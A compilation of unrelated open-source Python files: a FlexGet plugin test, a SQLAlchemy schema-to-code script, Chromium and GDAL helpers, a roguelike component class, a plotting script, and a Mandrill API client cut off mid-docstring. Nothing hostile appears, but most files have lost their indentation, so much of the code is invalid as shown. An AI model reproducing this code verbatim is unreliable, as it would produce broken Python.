# ==============================================================================
# asm0dey/Flexget :: tests/test_import_series_betaseries_list.py  (license: mit)
# ==============================================================================
from __future__ import unicode_literals, division, absolute_import
from mock import patch, call
from tests import FlexGetBase
import flexget.plugins.input.betaseries_list
def assert_mock_calls(expected_calls, mock_object):
assert expected_calls == mock_object.mock_calls, "expecting calls %r, got %r instead" % \
(expected_calls, mock_object.mock_calls)
def assert_series_count_in_db(expected_count):
from flexget.plugins.filter.series import Series
from flexget.manager import Session
session = Session()
actual_series_count = session.query(Series).count()
assert expected_count == actual_series_count, "expecting %s series stored in db, got %s instead" % \
(expected_count, actual_series_count)
class Test_import_series_betaseries_list(FlexGetBase):
__yaml__ = """
tasks:
test_no_members:
configure_series:
from:
betaseries_list:
username: user_foo
password: passwd_foo
api_key: api_key_foo
test_with_one_members:
configure_series:
from:
betaseries_list:
username: user_foo
password: passwd_foo
api_key: api_key_foo
members:
- other_member_1
test_with_two_members:
configure_series:
from:
betaseries_list:
username: user_foo
password: passwd_foo
api_key: api_key_foo
members:
- other_member_1
- other_member_2
"""
def setup(self):
super(Test_import_series_betaseries_list, self).setup()
## mock create_token
self.create_token_patcher = patch.object(flexget.plugins.input.betaseries_list, "create_token",
return_value='token_foo')
self.create_token_mock = self.create_token_patcher.start()
## mock query_series
self.query_series_patcher = patch.object(flexget.plugins.input.betaseries_list, "query_series",
return_value=[])
self.query_series_mock = self.query_series_patcher.start()
def teardown(self):
super(Test_import_series_betaseries_list, self).teardown()
self.create_token_patcher.stop()
self.query_series_patcher.stop()
def test_no_members(self):
# GIVEN
self.query_series_mock.return_value = ["Breaking Bad", "Dexter"]
# WHEN
self.execute_task('test_no_members')
# THEN
assert_series_count_in_db(2)
assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
assert_mock_calls([call('api_key_foo', 'token_foo', 'user_foo')], self.query_series_mock)
def test_with_one_members(self):
# GIVEN
self.query_series_mock.return_value = ["Breaking Bad", "Dexter", "The Simpsons"]
# WHEN
self.execute_task('test_with_one_members')
# THEN
assert_series_count_in_db(3)
assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
assert_mock_calls([call('api_key_foo', 'token_foo', 'other_member_1')], self.query_series_mock)
def test_with_two_members(self):
# GIVEN
return_values_generator = (val for val in [
["Family guy", "The Simpsons"],
["Breaking Bad", "Dexter", "The Simpsons"],
])
        self.query_series_mock.side_effect = lambda *args: next(return_values_generator)
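        # Note: mock's side_effect also accepts an iterable directly, which
        # would avoid the generator/lambda pair above, e.g.:
        #   self.query_series_mock.side_effect = [
        #       ["Family guy", "The Simpsons"],
        #       ["Breaking Bad", "Dexter", "The Simpsons"],
        #   ]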
# WHEN
self.execute_task('test_with_two_members')
# THEN
assert_series_count_in_db(4)
assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
assert_mock_calls(
[
call('api_key_foo', 'token_foo', 'other_member_1'),
call('api_key_foo', 'token_foo', 'other_member_2')
], self.query_series_mock)

# ==============================================================================
# bmcfee/gordon :: gordon/web/gordonweb/autocode2.py  (license: gpl-3.0)
# ==============================================================================
# autocode.py
#
# Author(s): Christophe de Vienne <[email protected]>
# Paul Johnson
#
# Based on autocode.py by Paul Johnson
# (http://www.sqlalchemy.org/trac/wiki/UsageRecipes/AutoCode)
#
# Improvements over the original autocode.py:
# * Takes arguments on the command line to select the dburl and
# the output destination
# * Replace a bunch of database specific types by generic ones.
# This is incomplete as it feats only my needs for a mysql to mssql
# database conversion.
# * Output the indexes and ForeignKeyConstraints (including multi-columns
# ones) correctly
#
# The resulting script is directly usable (ie import and create/use the tables)
# with my testing database (a legacy mysql db with about 140+ tables, 140+
# foreign keys, 170+ indexes), after applying patches
# http://www.sqlalchemy.org/trac/ticket/662 and
# http://www.sqlalchemy.org/trac/ticket/663 on a 0.3.9 release.
#
from sqlalchemy import *
from sqlalchemy.databases import information_schema
import sys
from optparse import OptionParser
parser = OptionParser("usage: %prog [options] dburl")
parser.add_option('--output', '-o', action='store', dest='output',
metavar='FILE', default='stdout',
help='Write the result into FILE (default "stdout")')
(options, args) = parser.parse_args()
if len(args) != 1:
    parser.error('Wrong number of arguments')
dburl = engine.url.make_url(args[0])
db = create_engine(dburl)
metadata = BoundMetaData(db)
if options.output == 'stdout':
output = sys.stdout
else:
output = open(options.output, 'w')
def textclause_repr(self):
return 'text(%s)' % repr(self.text)
def table_repr(self):
return "Table(%s)" % ",\n ".join(
[repr(self.name)] + [repr(self.metadata)] +
[repr(x) for x in self.columns] +
[repr(x) for x in self.constraints
if not isinstance(x, PrimaryKeyConstraint)]
)
def column_repr(self):
kwarg = []
if self.key != self.name:
kwarg.append('key')
if self._primary_key:
kwarg.append('primary_key')
if not self.nullable:
kwarg.append('nullable')
if self.onupdate:
kwarg.append('onupdate')
if self.default:
kwarg.append('default')
return "Column(%s)" % ', '.join(
[repr(self.name)] + [repr(self.type)] +
[repr(x) for x in self.constraints] +
["%s=%s" % (k, repr(getattr(self, k))) for k in kwarg]
)
def foreignkeyconstraint_repr(self):
return "ForeignKeyConstraint(%s)" % ', '.join(
[
repr([x.parent.name for x in self.elements]),
repr([x._get_colspec() for x in self.elements]),
'name=' + repr(self.name)
]
)
def repr_index(index, tvarname):
return "Index(%s)" % ", ".join(
[repr(index.name)] +
["%s.c.%s" % (tvarname, c.name) for c in index.columns] +
['unique=' + repr(index.unique)])
sql._TextClause.__repr__ = textclause_repr
schema.Table.__repr__ = table_repr
schema.Column.__repr__ = column_repr
schema.ForeignKeyConstraint.__repr__ = foreignkeyconstraint_repr
tables_query = select([information_schema.tables.c.table_name,
                       information_schema.tables.c.table_schema],
                      information_schema.tables.c.table_schema == dburl.database)
output.write("""from sqlalchemy import *
metadata = MetaData()
""")
tname_list = []
for tname, tschema in db.execute(tables_query):
    if tschema != dburl.database:
        continue
    tname_list.append(tname)
    tbl = Table(tname, metadata, schema=tschema, autoload=True)
code = repr(tbl)
code = code.replace('BoundMetaData()', 'metadata')
code = code.replace('MSChar', 'CHAR')
code = code.replace('MSSmallInteger(length=1)', 'Boolean()')
code = code.replace('MSSmallInteger', 'SmallInteger')
code = code.replace('MSDateTime', 'DateTime')
code = code.replace('MSMediumText', 'TEXT')
code = code.replace('MSDouble', 'Numeric')
code = code.replace('MSLongBlob', 'TEXT')
code = code.replace('MSString', 'String')
code = code.replace('MSDate', 'Date')
code = code.replace('MSTime', 'DateTime')
code = code.replace('MSInteger', 'Integer')
code = code.replace('MSDecimal', 'Numeric')
code = code.replace('MSEnum', 'Integer')
indexes = "\n".join(
[repr_index(index, tname) for index in tbl.indexes])
output.write( """
%s = %s
%s
""" % (tname, code, indexes))
# vim: expandtab tabstop=4 shiftwidth=4:

# ==============================================================================
# PeterWangIntel/chromium-crosswalk :: third_party/mojo/src/mojo/public/tools/dart_list_packages_contents.py  (license: bsd-3-clause)
# ==============================================================================
#!/usr/bin/python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script outputs the filenames of the files that are in the "packages/"
subdir of the given directory, relative to that directory."""
import argparse
import os
import sys
def main(target_directory):
os.chdir(target_directory)
for root, _, files in os.walk("packages", followlinks=True):
for f in files:
print os.path.join(root, f)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="List filenames of files in the packages/ subdir of the "
"given directory.")
parser.add_argument("--target-directory",
dest="target_directory",
metavar="<target-directory>",
type=str,
required=True,
help="The target directory, specified relative to this "
"directory.")
args = parser.parse_args()
sys.exit(main(args.target_directory))
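# Example invocation (hypothetical target directory; it only needs to contain
# a "packages/" subdirectory):
#
#   python dart_list_packages_contents.py \
#       --target-directory=out/Debug/gen/dart-pkg/example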

# ==============================================================================
# schwehr/gdal-autotest2 :: python/gcore/geoloc_test.py  (license: apache-2.0)
# ==============================================================================
#!/usr/bin/env python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is a complete rewrite of a file licensed as follows:
#
# Copyright (c) 2007, Frank Warmerdam <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""Test geolocation warper.
Rewrite of:
http://trac.osgeo.org/gdal/browser/trunk/autotest/gcore/geoloc.py
"""
import contextlib
import os
from osgeo import gdal
import unittest
from autotest2.gcore import gcore_util
from autotest2.gdrivers import gdrivers_util
EXT = '.vrt'
@contextlib.contextmanager
def PushDir(path):
orig_path = os.getcwd()
os.chdir(path)
yield
os.chdir(orig_path)
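# PushDir temporarily switches the working directory for the enclosed block
# and restores it afterwards; the test below relies on it so that relative
# paths referenced inside warpsst.vrt resolve. Illustrative use (hypothetical
# path and file):
#
#   with PushDir('/tmp/data'):
#     f = open('grid.dat')  # opened relative to /tmp/data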
@gdrivers_util.SkipIfDriverMissing(gdrivers_util.VRT_DRIVER)
@gdrivers_util.SkipIfDriverMissing(gdrivers_util.GTIFF_DRIVER)
class GeolocTest(gdrivers_util.DriverTestCase):
def setUp(self):
super(GeolocTest, self).setUp(gdrivers_util.VRT_DRIVER, EXT)
def testGeoloc01WarpSst(self):
filepath = gcore_util.GetTestFilePath('warpsst.vrt')
with PushDir(os.path.dirname(filepath)):
self.CheckOpen(filepath)
self.CheckGeoTransform((-90.30271148, 0.15466423, 0, 33.87552642, 0,
-0.15466423))
# TODO(schwehr): The changing checksum of the band with GDAL updates implies
# that this test is brittle and needs to be reworked.
self.CheckBand(1, 62319, gdal.GDT_Int16)
if __name__ == '__main__':
unittest.main()

# ==============================================================================
# jpalladino84/Python-Roguelike-Framework :: components/game_object.py  (license: mit)
# ==============================================================================
from components.component import valid_components
class GameObject(object):
def __init__(self):
self.components = {}
self.observers = {}
self.responders = {}
def copy_to(self, new_game_object):
for component in self.components.values():
new_game_object.register_component(component.copy())
return new_game_object
def get_component(self, component_name):
return self.components.get(component_name, None)
def update(self):
for component in self.components.values():
component.update()
def transmit_message(self, sender, message_type, **kwargs):
if message_type in self.observers:
for observer, func in self.observers[message_type]:
if observer != sender:
func(**kwargs)
def transmit_query(self, sender, query_type, **kwargs):
responses = []
if query_type in self.responders:
for responder, func in self.responders[query_type]:
if responder != sender:
responses.append(func(**kwargs))
return responses
def register_observer(self, observer, message_type, func):
if message_type not in self.observers:
self.observers[message_type] = []
if func not in self.observers[message_type]:
self.observers[message_type].append((observer, func))
def register_query_responder(self, responder, query_type, func):
if query_type not in self.responders:
self.responders[query_type] = []
if func not in self.responders[query_type]:
self.responders[query_type].append((responder, func))
def register_component(self, component):
if component.NAME in self.components:
self.unregister_component(component)
self.components[component.NAME] = component
component.on_register(self)
def unregister_component(self, component):
if component.NAME in self.components:
component.on_unregister()
del self.components[component.NAME]
def __getattr__(self, item):
if item in valid_components:
component = self.get_component(item)
if component:
return component
return NoneVoid()
        raise AttributeError(item)
class NoneVoid(object):
"""
    This class's only purpose is to falsify any attribute lookups made on it.
It allows us to duck type into components a little easier.
"""
def __getattr__(self, item):
return None
def __bool__(self):
return False
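
# A minimal usage sketch. _DemoComponent below is hypothetical; real components
# live in components.component and expose the same interface (NAME, copy,
# update, on_register, on_unregister) that GameObject calls above.
if __name__ == '__main__':
    class _DemoComponent(object):
        NAME = 'demo'

        def copy(self):
            return _DemoComponent()

        def update(self):
            pass

        def on_register(self, game_object):
            self.owner = game_object

        def on_unregister(self):
            self.owner = None

    obj = GameObject()
    obj.register_component(_DemoComponent())
    print(obj.get_component('demo'))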

# ==============================================================================
# MattDerry/pendulum_3d :: src/plot_scripts/plot.py  (license: gpl-2.0)
# ==============================================================================
#!/usr/bin/env python
import numpy as np
import pylab
import yaml
stream = open('time.yaml', 'r')
TIME_LOG = yaml.load(stream)
stream.close()
time2 = TIME_LOG[1]
time4 = TIME_LOG[2]
time6 = TIME_LOG[3]
time8 = TIME_LOG[4]
time10 = TIME_LOG[5]
stream = open('config.yaml', 'r')
CONFIG_LOG = yaml.load(stream)
stream.close()
for i in range(0, len(CONFIG_LOG)):
for j in range(0, len(CONFIG_LOG[i])):
for k in range(0, len(CONFIG_LOG[i][j])):
if np.isnan(CONFIG_LOG[i][j][k]):
print "Config NaN found and replaced"
CONFIG_LOG[i][j][k] = 0
config2 = np.asanyarray(CONFIG_LOG[1])
config4 = np.asanyarray(CONFIG_LOG[2])
config6 = np.asanyarray(CONFIG_LOG[3])
config8 = np.asanyarray(CONFIG_LOG[4])
config10 = np.asanyarray(CONFIG_LOG[5])
stream = open('command.yaml', 'r')
COMMAND_LOG = yaml.load(stream)
stream.close()
for i in range(0, len(COMMAND_LOG)):
for j in range(0, len(COMMAND_LOG[i])):
for k in range(0, len(COMMAND_LOG[i][j])):
if np.isnan(COMMAND_LOG[i][j][k]):
print "Command NaN found and replaced"
COMMAND_LOG[i][j][k] = 0
command2 = np.asanyarray(COMMAND_LOG[1])
command4 = np.asanyarray(COMMAND_LOG[2])
command6 = np.asanyarray(COMMAND_LOG[3])
command8 = np.asanyarray(COMMAND_LOG[4])
command10 = np.asanyarray(COMMAND_LOG[5])
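# Aside: the NaN scrubbing loops above could also be written with numpy's
# vectorized helper, e.g. np.nan_to_num(np.asanyarray(CONFIG_LOG[1])), though
# nan_to_num additionally clamps infinities, which the loops leave untouched.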
#roygbiv
ax1 = pylab.subplot(211)
line2, = pylab.plot(time2, config2[:,0])
line4, = pylab.plot(time4, config4[:,0])
line6, = pylab.plot(time6, config6[:,0])
line8, = pylab.plot(time8, config8[:,0])
line10, = pylab.plot(time10, config10[:,0])
pylab.axvline(x=1.0, linewidth=3, linestyle="--", color="gray")
pylab.setp(line2, linewidth=3, color='red')
pylab.setp(line4, linewidth=3, color='orange')
pylab.setp(line6, linewidth=3, color='yellow')
pylab.setp(line8, linewidth=3, color='green')
pylab.setp(line10, linewidth=3, color='blue')
pylab.legend([line2, line4, line6, line8, line10], ["Trust 0.2", "Trust 0.4", "Trust 0.6", "Trust 0.8", "Trust 1.0"])
pylab.title("Feedback Controller Input Blended with User Input at Different Levels of Trust")
pylab.ylabel("Base Joint Angle about X-axis (radians)")
ax2 = pylab.subplot(212, sharex=ax1)
line2, = pylab.plot(time2, config2[:,1])
line4, = pylab.plot(time4, config4[:,1])
line6, = pylab.plot(time6, config6[:,1])
line8, = pylab.plot(time8, config8[:,1])
line10, = pylab.plot(time10, config10[:,1])
pylab.axvline(x=1.0, linewidth=3, linestyle="--", color="gray")
pylab.setp(line2, linewidth=3, color='red')
pylab.setp(line4, linewidth=3, color='orange')
pylab.setp(line6, linewidth=3, color='yellow')
pylab.setp(line8, linewidth=3, color='green')
pylab.setp(line10, linewidth=3, color='blue')
pylab.legend([line2, line4, line6, line8, line10], ["Trust 0.2", "Trust 0.4", "Trust 0.6", "Trust 0.8", "Trust 1.0"])
pylab.xlabel("Time (sec)")
pylab.ylabel("Base Joint Angle about Y-axis (radians)")
pylab.show()

# ==============================================================================
# bitex-coin/backend :: mailer/mandrill.py  (license: mit)
# ==============================================================================
import requests, os.path, logging, sys, time
try:
import ujson as json
except ImportError:
try:
import simplejson as json
except ImportError:
import json
class Error(Exception):
pass
class ValidationError(Error):
pass
class InvalidKeyError(Error):
pass
class PaymentRequiredError(Error):
pass
class UnknownSubaccountError(Error):
pass
class UnknownTemplateError(Error):
pass
class ServiceUnavailableError(Error):
pass
class UnknownMessageError(Error):
pass
class InvalidTagNameError(Error):
pass
class InvalidRejectError(Error):
pass
class UnknownSenderError(Error):
pass
class UnknownUrlError(Error):
pass
class UnknownTrackingDomainError(Error):
pass
class InvalidTemplateError(Error):
pass
class UnknownWebhookError(Error):
pass
class UnknownInboundDomainError(Error):
pass
class UnknownInboundRouteError(Error):
pass
class UnknownExportError(Error):
pass
class IPProvisionLimitError(Error):
pass
class UnknownPoolError(Error):
pass
class NoSendingHistoryError(Error):
pass
class PoorReputationError(Error):
pass
class UnknownIPError(Error):
pass
class InvalidEmptyDefaultPoolError(Error):
pass
class InvalidDeleteDefaultPoolError(Error):
pass
class InvalidDeleteNonEmptyPoolError(Error):
pass
class InvalidCustomDNSError(Error):
pass
class InvalidCustomDNSPendingError(Error):
pass
class MetadataFieldLimitError(Error):
pass
class UnknownMetadataFieldError(Error):
pass
ROOT = 'https://mandrillapp.com/api/1.0/'
ERROR_MAP = {
'ValidationError': ValidationError,
'Invalid_Key': InvalidKeyError,
'PaymentRequired': PaymentRequiredError,
'Unknown_Subaccount': UnknownSubaccountError,
'Unknown_Template': UnknownTemplateError,
'ServiceUnavailable': ServiceUnavailableError,
'Unknown_Message': UnknownMessageError,
'Invalid_Tag_Name': InvalidTagNameError,
'Invalid_Reject': InvalidRejectError,
'Unknown_Sender': UnknownSenderError,
'Unknown_Url': UnknownUrlError,
'Unknown_TrackingDomain': UnknownTrackingDomainError,
'Invalid_Template': InvalidTemplateError,
'Unknown_Webhook': UnknownWebhookError,
'Unknown_InboundDomain': UnknownInboundDomainError,
'Unknown_InboundRoute': UnknownInboundRouteError,
'Unknown_Export': UnknownExportError,
'IP_ProvisionLimit': IPProvisionLimitError,
'Unknown_Pool': UnknownPoolError,
'NoSendingHistory': NoSendingHistoryError,
'PoorReputation': PoorReputationError,
'Unknown_IP': UnknownIPError,
'Invalid_EmptyDefaultPool': InvalidEmptyDefaultPoolError,
'Invalid_DeleteDefaultPool': InvalidDeleteDefaultPoolError,
'Invalid_DeleteNonEmptyPool': InvalidDeleteNonEmptyPoolError,
'Invalid_CustomDNS': InvalidCustomDNSError,
'Invalid_CustomDNSPending': InvalidCustomDNSPendingError,
'Metadata_FieldLimit': MetadataFieldLimitError,
'Unknown_MetadataField': UnknownMetadataFieldError
}
logger = logging.getLogger('mandrill')
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler(sys.stderr))
class Mandrill(object):
def __init__(self, apikey=None, debug=False):
'''Initialize the API client
Args:
apikey (str|None): provide your Mandrill API key. If this is left as None, we will attempt to get the API key from the following locations::
- MANDRILL_APIKEY in the environment vars
- ~/.mandrill.key for the user executing the script
- /etc/mandrill.key
debug (bool): set to True to log all the request and response information to the "mandrill" logger at the INFO level. When set to false, it will log at the DEBUG level. By default it will write log entries to STDERR
'''
self.session = requests.session()
if debug:
self.level = logging.INFO
else:
self.level = logging.DEBUG
self.last_request = None
if apikey is None:
if 'MANDRILL_APIKEY' in os.environ:
apikey = os.environ['MANDRILL_APIKEY']
else:
apikey = self.read_configs()
if apikey is None: raise Error('You must provide a Mandrill API key')
self.apikey = apikey
self.templates = Templates(self)
self.exports = Exports(self)
self.users = Users(self)
self.rejects = Rejects(self)
self.inbound = Inbound(self)
self.tags = Tags(self)
self.messages = Messages(self)
self.whitelists = Whitelists(self)
self.ips = Ips(self)
self.internal = Internal(self)
self.subaccounts = Subaccounts(self)
self.urls = Urls(self)
self.webhooks = Webhooks(self)
self.senders = Senders(self)
self.metadata = Metadata(self)
def call(self, url, params=None):
'''Actually make the API call with the given params - this should only be called by the namespace methods - use the helpers in regular usage like m.tags.list()'''
if params is None: params = {}
params['key'] = self.apikey
params = json.dumps(params)
self.log('POST to %s%s.json: %s' % (ROOT, url, params))
start = time.time()
r = self.session.post('%s%s.json' % (ROOT, url), data=params, headers={'content-type': 'application/json', 'user-agent': 'Mandrill-Python/1.0.55'})
try:
remote_addr = r.raw._original_response.fp._sock.getpeername() # grab the remote_addr before grabbing the text since the socket will go away
except:
remote_addr = (None, None) #we use two private fields when getting the remote_addr, so be a little robust against errors
response_body = r.text
complete_time = time.time() - start
self.log('Received %s in %.2fms: %s' % (r.status_code, complete_time * 1000, r.text))
self.last_request = {'url': url, 'request_body': params, 'response_body': r.text, 'remote_addr': remote_addr, 'response': r, 'time': complete_time}
result = json.loads(response_body)
if r.status_code != requests.codes.ok:
raise self.cast_error(result)
return result
def cast_error(self, result):
'''Take a result representing an error and cast it to a specific exception if possible (use a generic mandrill.Error exception for unknown cases)'''
if not 'status' in result or result['status'] != 'error' or not 'name' in result:
raise Error('We received an unexpected error: %r' % result)
if result['name'] in ERROR_MAP:
return ERROR_MAP[result['name']](result['message'])
return Error(result['message'])
def read_configs(self):
'''Try to read the API key from a series of files if it's not provided in code'''
paths = [os.path.expanduser('~/.mandrill.key'), '/etc/mandrill.key']
for path in paths:
try:
f = open(path, 'r')
apikey = f.read().strip()
f.close()
if apikey != '':
return apikey
except:
pass
return None
def log(self, *args, **kwargs):
'''Proxy access to the mandrill logger, changing the level based on the debug setting'''
logger.log(self.level, *args, **kwargs)
def __repr__(self):
return '<Mandrill %s>' % self.apikey
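# A minimal usage sketch (assumes a valid key in MANDRILL_APIKEY or in one of
# the key files that read_configs() checks):
#
#   m = Mandrill()
#   try:
#       m.users.ping()           # returns the string "PONG!"
#   except InvalidKeyError:      # specific subclasses come from ERROR_MAP
#       pass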
class Templates(object):
def __init__(self, master):
self.master = master
def add(self, name, from_email=None, from_name=None, subject=None, code=None, text=None, publish=True, labels=[]):
"""Add a new template
Args:
name (string): the name for the new template - must be unique
from_email (string): a default sending address for emails sent using this template
from_name (string): a default from name to be used
subject (string): a default subject line to be used
code (string): the HTML code for the template with mc:edit attributes for the editable elements
text (string): a default text part to be used when sending with this template
publish (boolean): set to false to add a draft template without publishing
labels (array): an optional array of up to 10 labels to use for filtering templates::
labels[] (string): a single label
Returns:
struct. the information saved about the new template::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidTemplateError: The given template name already exists or contains invalid characters
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name, 'from_email': from_email, 'from_name': from_name, 'subject': subject, 'code': code, 'text': text, 'publish': publish, 'labels': labels}
return self.master.call('templates/add', _params)
def info(self, name):
"""Get the information for an existing template
Args:
name (string): the immutable name of an existing template
Returns:
struct. the requested template information::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('templates/info', _params)
def update(self, name, from_email=None, from_name=None, subject=None, code=None, text=None, publish=True, labels=None):
"""Update the code for an existing template. If null is provided for any fields, the values will remain unchanged.
Args:
name (string): the immutable name of an existing template
from_email (string): the new default sending address
from_name (string): the new default from name
subject (string): the new default subject line
code (string): the new code for the template
text (string): the new default text part to be used
publish (boolean): set to false to update the draft version of the template without publishing
labels (array): an optional array of up to 10 labels to use for filtering templates::
labels[] (string): a single label
Returns:
struct. the template that was updated::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name, 'from_email': from_email, 'from_name': from_name, 'subject': subject, 'code': code, 'text': text, 'publish': publish, 'labels': labels}
return self.master.call('templates/update', _params)
def publish(self, name):
"""Publish the content for the template. Any new messages sent using this template will start using the content that was previously in draft.
Args:
name (string): the immutable name of an existing template
Returns:
struct. the template that was published::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('templates/publish', _params)
def delete(self, name):
"""Delete a template
Args:
name (string): the immutable name of an existing template
Returns:
struct. the template that was deleted::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('templates/delete', _params)
def list(self, label=None):
"""Return a list of all the templates available to this user
Args:
label (string): an optional label to filter the templates
Returns:
array. an array of structs with information about each template::
[] (struct): the information on each template in the account::
[].slug (string): the immutable unique code name of the template
[].name (string): the name of the template
[].labels (array): the list of labels applied to the template::
[].labels[] (string): a single label
[].code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
